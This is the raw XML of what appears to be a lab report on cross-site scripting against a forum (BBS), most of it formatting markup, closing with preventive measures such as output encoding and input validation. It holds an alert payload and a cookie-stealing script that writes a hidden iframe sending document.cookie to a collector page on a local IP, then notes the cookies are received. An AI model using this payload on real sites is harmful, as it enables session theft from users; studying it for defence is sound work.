        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">add comments containing: </w:t>
      </w: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53340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>522605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5155565" cy="2900045"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"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&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>script&gt;alert(document.cookie)&lt;/script&gt;</w:t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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>build a IIS website to save the cookies</w:t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169545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>77470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5650230" cy="3178175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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>add comments containing:</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write("&lt;iframe width=0 height=0 src='</w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://10.1.1.78/cookie.asp?cookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>="+document.cookie+"'&gt;&lt;/iframe&gt;");&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14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158115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>59690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5632450" cy="3168015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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40" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Now we receive the cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:left="840" w:hanging="0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133350</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>142875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5853430" cy="3292475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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40" w:after="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1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spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="Preventive_measures"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Preventive measures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="Contextual_output_encoding.2Fescaping_of_string_input"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Contextual output encoding/escaping of string input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="Safely_validating_untrusted_HTML_input"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>validating untrusted HTML input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="Disabling_scripts"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Disabling scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>use new tools like “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Javascript sandbox tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The bbs is full of vulnerability . It needs some patch to fix the system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:left="840" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:firstLine="42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Normal"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:firstLine="420"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId22"/>
      <w:footerReference w:type="default" r:id="rId23"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="1134" w:right="1134" w:header="397" w:top="1134" w:footer="397" w:bottom="1134" w:gutter="0"/>
      <w:pgNumType w:fmt="decimal"/>
      <w:formProt w:val="false"/>
      <w:textDirection w:val="lrTb"/>
      <w:docGrid w:type="default" w:linePitch="326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DejaVu Serif">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="华文行楷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宋体">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="黑体">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="楷体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5000" w:type="pct"/>
      <w:jc w:val="left"/>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="18" w:space="0" w:color="808080"/>
        <w:right w:val="single" w:sz="18" w:space="0" w:color="808080"/>
        <w:insideV w:val="single" w:sz="18" w:space="0" w:color="808080"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="04a0" w:noVBand="1" w:noHBand="0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="4770"/>
      <w:gridCol w:w="4867"/>
    </w:tblGrid>
    <w:tr>
      <w:trPr/>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4770" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="18" w:space="0" w:color="808080"/>
            <w:right w:val="single" w:sz="18" w:space="0" w:color="808080"/>
            <w:insideV w:val="single" w:sz="18" w:space="0" w:color="808080"/>
          </w:tcBorders>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Footer"/>
            <w:ind w:right="420" w:hanging="0"/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="楷体" w:ascii="楷体" w:hAnsi="楷体"/>
              <w:b/>
              <w:sz w:val="21"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t xml:space="preserve">Page </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="楷体" w:ascii="楷体" w:hAnsi="楷体"/>
              <w:b/>
              <w:sz w:val="21"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText> PAGE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eastAsia="楷体" w:ascii="楷体" w:hAnsi="楷体"/>
              <w:b/>
              <w:sz w:val="21"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t xml:space="preserve"> / </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="楷体" w:ascii="楷体" w:hAnsi="楷体"/>
              <w:b/>
              <w:sz w:val="21"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText> NUMPAGES </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>10</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4867" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="18" w:space="0" w:color="808080"/>
            <w:left w:val="single" w:sz="18" w:space="0" w:color="808080"/>
            <w:right w:val="single" w:sz="18" w:space="0" w:color="808080"/>
            <w:insideV w:val="single" w:sz="18" w:space="0" w:color="808080"/>
          </w:tcBorders>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:tcMar>
            <w:left w:w="-22" w:type="dxa"/>
          </w:tcMar>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Footer"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:rFonts w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体"/>
              <w:b/>
              <w:b/>
              <w:sz w:val="21"/>
              <w:szCs w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="楷体" w:ascii="楷体" w:hAnsi="楷体"/>
              <w:b/>
              <w:sz w:val="21"/>
              <w:szCs w:val="21"/>
            </w:rPr>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl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thickThinSmallGap" w:sz="24" w:space="11" w:color="622423"/>
      </w:pBdr>
      <w:rPr>
        <w:rFonts w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体"/>
        <w:b/>
        <w:b/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="楷体" w:ascii="楷体" w:hAnsi="楷体"/>
        <w:b/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21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chineseCountingThousand"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="630" w:hanging="630"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:rFonts w:eastAsia="华文行楷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40"/>
  <w:defaultTabStop w:val="420"/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styleId="Normal" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:jc w:val="both"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="宋体" w:cs="Lohit Hindi" w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Heading"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:suppressAutoHyphens w:val="false"/>
      <w:spacing w:lineRule="auto" w:line="408" w:before="260" w:after="260"/>
      <w:textAlignment w:val="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:qFormat/>
    <w:pPr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1" w:customStyle="1">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style12" w:customStyle="1">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="2Char" w:customStyle="1">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Mangal" w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="29"/>
      <w:lang w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style13" w:customStyle="1">
    <w:name w:val="标题 字符"/>
    <w:link w:val="a8"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="2" w:customStyle="1">
    <w:name w:val="标题 2 字符"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Char" w:customStyle="1">
    <w:name w:val="标题 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Mangal" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="29"/>
      <w:lang w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel1">
    <w:name w:val="ListLabel 1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel2">
    <w:name w:val="ListLabel 2"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel3">
